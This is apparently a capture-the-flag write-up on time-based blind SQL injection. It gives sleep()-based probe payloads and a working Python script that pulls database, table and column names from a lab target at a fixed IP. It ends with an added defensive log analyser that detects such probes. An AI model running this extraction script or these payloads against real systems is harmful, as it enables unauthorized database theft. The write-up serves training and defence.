SQL time-based blind injection
1. The starting page. The target is not this page itself: click the "任性网页" link at the bottom.
2. The hint says the parameter is passed in the URL, so append a single quote: ?type=1'
Since the hint says time-based blind injection, try:
?type=1' and sleep(5)%23
No time delay.
Remove the single quote (?type=1 and sleep(5)%23):
There is a 5-second delay, so the value is spliced into the query as a bare number, not inside quotes.
Because the only signal is the time delay and nothing is ever echoed back, the options are a Python script or sqlmap.
Here is the script, but it errors later on and I could not find the cause; it only managed to get the columns of the flag and goods tables.
import datetime
import requests
from urllib.parse import quote

URL = "http://219.153.49.228:44261/flag.php?type=1"
DIGITS_LOWER = '0123456789abcdefghijklmnopqrstuvwxyz'
CHARSET = DIGITS_LOWER + ',./`?<>-_=+~!@#$%^&*()'

session = requests.Session()
session.keep_alive = False  # requests uses urllib3 keep-alive by default; disable it to close surplus connections
requests.adapters.DEFAULT_RETRIES = 8  # retry count, so connections are not dropped when the request rate is high


def delayed(payload):
    """Send one probe and return True if the response took long enough for sleep(2) to have fired,
    i.e. the injected condition was true.  The payload is URL-encoded before it is sent: the charset
    contains '&', '#', '%' and '+', which the original script appended raw, so those probes were
    mangled into a query separator, a fragment, a bad escape or a space.
    '%23' is the encoded '#' that comments out the rest of the query."""
    start = datetime.datetime.now()
    full = URL + quote(payload, safe="") + "%23"
    print(full)
    session.get(full)
    return (datetime.datetime.now() - start).total_seconds() > 1.5


def lenStr(name):
    """Find the length of the SQL expression `name` by probing length()=i for i in 0..299."""
    for i in range(300):  # raised from 100: group_concat over several tables exceeded it, and None was returned
        if delayed(" and if(length(" + name + ")=" + str(i) + ",sleep(2),1)"):
            print(name + " len is %d" % i)
            return i
    raise ValueError("length of %s not found" % name)


def extract(name, charset):
    """Recover the value of the SQL expression `name` one character at a time.
    substr() is 1-based, so positions run 1..len (the original used 0..len-1 for the
    columns, which wasted one probe and dropped the last character)."""
    value = ''
    for i in range(1, lenStr(name) + 1):
        for j in charset:
            if delayed(" and if(substr(" + name + "," + str(i) + ",1)='" + j + "',sleep(2),1)"):
                value += j
                print(value)
                break
    return value


def database():
    return extract("database()", DIGITS_LOWER)


def table():
    return extract("(select group_concat(table_name) from information_schema.tables "
                   "where table_schema=database())", CHARSET)


def column(table_name):
    # Column names are collected per table; the original accumulated them across tables in one string
    result = {}
    for tb in table_name.split(","):
        result[tb] = extract("(select group_concat(column_name) from information_schema.columns "
                             "where table_name='" + tb + "')", CHARSET)
        print("table:" + tb + " column:" + result[tb])
    return result


if __name__ == '__main__':
    #database()
    column(table())
So just scan it with sqlmap instead.
Dump the database
Dump the tables
Dump the columns
Dump the values
Back to the first page.
Technical key point: time-based blind injection has no echo, so the only way to judge a condition is through sleep.
Manual injection: you have to guess table names and so on, which is tedious. It tests your fundamentals.
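The same property that makes this technique blind for the attacker makes it loud for the defender: every probe carries a delay primitive in the parameter, and the true branches stall the server for the sleep duration. The following is an added example, not part of the original writeup, that flags such probes in an access log; it assumes nginx-style lines with $request_time appended, and the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl
from collections import defaultdict

# Access-log line with the response time appended (nginx $request_time style); assumed format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]+" '
    r'(?P<status>\d{3}) \d+ (?P<rt>\d+\.\d+)$'
)
# Delay primitives used by time-based blind probes; the writeup's payloads rely on sleep().
DELAY_RE = re.compile(r"\b(sleep|benchmark)\s*\(", re.IGNORECASE)

# Constructed sample lines: one benign request, two probes from the writeup's pattern, one decoy.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Mar/2024:10:00:01 +0800] "GET /flag.php?type=1 HTTP/1.1" 200 734 0.012',
    '10.0.0.5 - - [12/Mar/2024:10:00:02 +0800] "GET /flag.php?type=1%20and%20if(length(database())%3D5,sleep(2),1)%23 HTTP/1.1" 200 734 2.004',
    '10.0.0.5 - - [12/Mar/2024:10:00:05 +0800] "GET /flag.php?type=1%20and%20if(substr(database(),1,1)%3D%27a%27,sleep(2),1)%23 HTTP/1.1" 200 734 0.011',
    '10.0.0.9 - - [12/Mar/2024:10:00:06 +0800] "GET /index.php?page=sleeping-bags HTTP/1.1" 200 4096 0.020',
]


def suspicious_params(target):
    """Decode the query string and return (name, value) pairs whose value calls a delay primitive."""
    query = urlsplit(target).query
    return [(name, value) for name, value in parse_qsl(query, keep_blank_values=True)
            if DELAY_RE.search(value)]


def analyze(lines, slow_threshold=1.5):
    """Group probes per client IP and count how many actually stalled the server.
    A slow hit means the injected condition was true, i.e. the injection works and data is leaking."""
    report = defaultdict(lambda: {"probes": 0, "slow": 0, "params": set()})
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = suspicious_params(m["target"])
        if not hits:
            continue
        entry = report[m["ip"]]
        entry["probes"] += 1
        entry["params"].update(name for name, _ in hits)
        if float(m["rt"]) >= slow_threshold:
            entry["slow"] += 1
    return dict(report)


if __name__ == "__main__":
    print(analyze(SAMPLE_LOG))
```

A character-by-character extraction like the one above needs one request per candidate character, so a high probe count from a single IP on one parameter is the stronger indicator; the slow count tells you whether the parameter is actually injectable.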